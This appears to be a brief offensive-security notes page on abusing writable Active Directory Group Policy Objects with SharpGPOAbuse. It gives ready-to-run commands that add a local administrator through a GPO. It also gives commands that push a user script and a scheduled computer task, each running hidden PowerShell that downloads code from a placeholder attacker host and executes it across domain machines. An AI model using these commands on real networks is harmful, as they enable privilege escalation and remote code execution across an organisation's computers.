After finding the GPOs over which a user we have control of has editing permissions, we can use some tools.

SharpGPOAbuse

Adding a local admin creating on an existent GPO a restricted group policy:

.\\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount "user.account" --GPOName "Vulnerable GPO"

--force: overrides any existing configurations

Untitled

Add a user script:

.\\SharpGPOAbuse.exe --AddUserScript --ScriptName "script.bat" --ScriptContents 'powershell.exe -nop -w hidden -c \\"IEX ((new-object net.webclient).downloadstring("<http://ip.of.attacking.machine>:port/a"))\\"' --GPOName "Vulnerable GPO"

Add a computer task:

.\\SharpGPOAbuse.exe --AddComputerTask --TaskName "TaskName" --Author "domain\\user" --Command "cmd.exe" --Arguments 'powershell.exe -nop -w hidden -c \\"IEX ((new-object net.webclient).downloadstring("<http://ip.of.attacking.machine>:port/a"))\\"' --GPOName "Vulnerable GPO"

<aside> ⏱️ It is necessary to wait for the GPO refresh interval (default 90 minutes) in order to see the effects of the abuse

</aside>